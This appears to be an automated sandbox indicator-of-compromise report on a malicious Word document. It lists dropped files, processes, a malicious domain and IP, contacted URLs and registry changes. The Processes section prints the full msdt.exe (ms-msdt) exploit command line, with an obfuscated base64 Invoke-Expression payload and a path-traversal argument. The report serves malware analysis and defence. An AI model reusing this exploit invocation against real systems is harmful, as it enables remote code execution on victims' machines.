IOC Report
MuUeMZphCk.docx

loading gif

Files

File Path
Type
Category
Malicious
MuUeMZphCk.docx
Microsoft OOXML
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\44E9E94D.htm
HTML document, ASCII text, with very long lines (4518)
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EAAD29A7.htm
HTML document, ASCII text, with very long lines (4518)
dropped
malicious
C:\Users\user\AppData\Local\Temp\3ns45r3e\3ns45r3e.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\khxlz5in\khxlz5in.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\sz5era1t\sz5era1t.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Windows\Temp\SDIAG_4e17c671-5921-447a-b483-437497eb417f\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Windows\Temp\SDIAG_4e17c671-5921-447a-b483-437497eb417f\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm
HTML document, ASCII text, with very long lines (4518)
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm
HTML document, ASCII text, with very long lines (4518)
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
modified
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\47AFFF8C-3205-4235-86A2-65AA4981F18A
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{D41A7237-320D-4724-AD88-6F31B446B26A}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{5363CA4F-61E3-4D8D-B7F0-D392CFB2E915}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{89EEA800-31B5-4659-835C-B39ED0DB259A}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\t[1].htm
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\t[1].htm
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\t[1].htm
HTML document, ASCII text, with very long lines (4518)
dropped
C:\Users\user\AppData\Local\Temp\3ns45r3e\CSCED7D8423AEF34545822E2F19382945.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RESD20C.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols, created Tue Jan 31 00:45:28 2023, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESE17D.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols, created Tue Jan 31 00:45:32 2023, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESEEEB.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols, created Tue Jan 31 00:45:35 2023, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\khxlz5in\CSCEF6EFF37DE7E45BE9A86A8101F6DD14.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\sz5era1t\CSCB136CE2933B94C34B46CFD62145DF12F.TMP
MSVC .res
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MuUeMZphCk.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 21:23:07 2022, mtime=Fri Dec 30 23:45:02 2022, atime=Fri Dec 30 23:44:53 2022, length=11537, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [misc]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\Desktop\~$UeMZphCk.docx
data
dropped
C:\Windows\Temp\SDIAG_4e17c671-5921-447a-b483-437497eb417f\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4e17c671-5921-447a-b483-437497eb417f\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4e17c671-5921-447a-b483-437497eb417f\TS_ProgramCompatibilityWizard.ps1
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4e17c671-5921-447a-b483-437497eb417f\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4e17c671-5921-447a-b483-437497eb417f\en-US\CL_LocalizationData.psd1
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4e17c671-5921-447a-b483-437497eb417f\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{74303997-B657-49E3-86A3-CDB672B97C40}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DAAEA1DB-A9D3-4BCE-A00E-241717FE421B}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\t[1].htm
HTML document, ASCII text, with very long lines (4518)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\t[1].htm
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{611D617C-89DE-47F7-979F-596893CFACC4}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{87D8FFE7-04E6-4C98-8E49-7EEE49FEBDC8}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\{1273F576-2E15-4DF7-B230-109720251EE0}
data
dropped
C:\Users\user\AppData\Local\Temp\{33DCD4F9-2DCF-40AD-ADF2-48E80BE10E8A}
data
dropped
There are 41 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bm90ZXBhZA=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3ns45r3e\3ns45r3e.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD20C.tmp" "c:\Users\user\AppData\Local\Temp\3ns45r3e\CSCED7D8423AEF34545822E2F19382945.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\khxlz5in\khxlz5in.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE17D.tmp" "c:\Users\user\AppData\Local\Temp\khxlz5in\CSCEF6EFF37DE7E45BE9A86A8101F6DD14.TMP"
C:\Windows\SysWOW64\notepad.exe
C:\Windows\system32\notepad.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sz5era1t\sz5era1t.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\sz5era1t\CSCB136CE2933B94C34B46CFD62145DF12F.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://baza-novostei.name/dir/info/priny/t.html
195.201.110.47
malicious
http://baza-novostei.name/dir/info/priny/t.html
195.201.110.47
malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
https://api.scheduler.
unknown
https://my.microsoftpersonalcontent.com
unknown
https://store.office.cn/addinstemplate
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
http://baza-novostei.name/dir/info/priny/t.htmlyX
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://consent.config.office.com/consentcheckin/v1.0/consents
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://d.docs.live.net
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://messaging.lifecycle.office.com/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://pushchannel.1drv.ms
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://make.powerautomate.com
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
https://management.azure.com/
unknown
https://messaging.lifecycle.office.com/getcustommessage16
unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
unknown
https://login.windows.net/common/oauth2/authorize
unknown
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://graph.windows.net/
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
baza-novostei.name
195.201.110.47
malicious

IPs

IP
Domain
Country
Malicious
195.201.110.47
baza-novostei.name
Germany
malicious
192.168.2.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
&#'
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
'#'
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
`&'
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
b+'
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://baza-novostei.name/dir/info/priny/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://baza-novostei.name/dir/info/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\240E8
240E8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Data
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2B1B3
2B1B3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutosaveInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2B1B3
2B1B3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
7p/
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
8p/
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
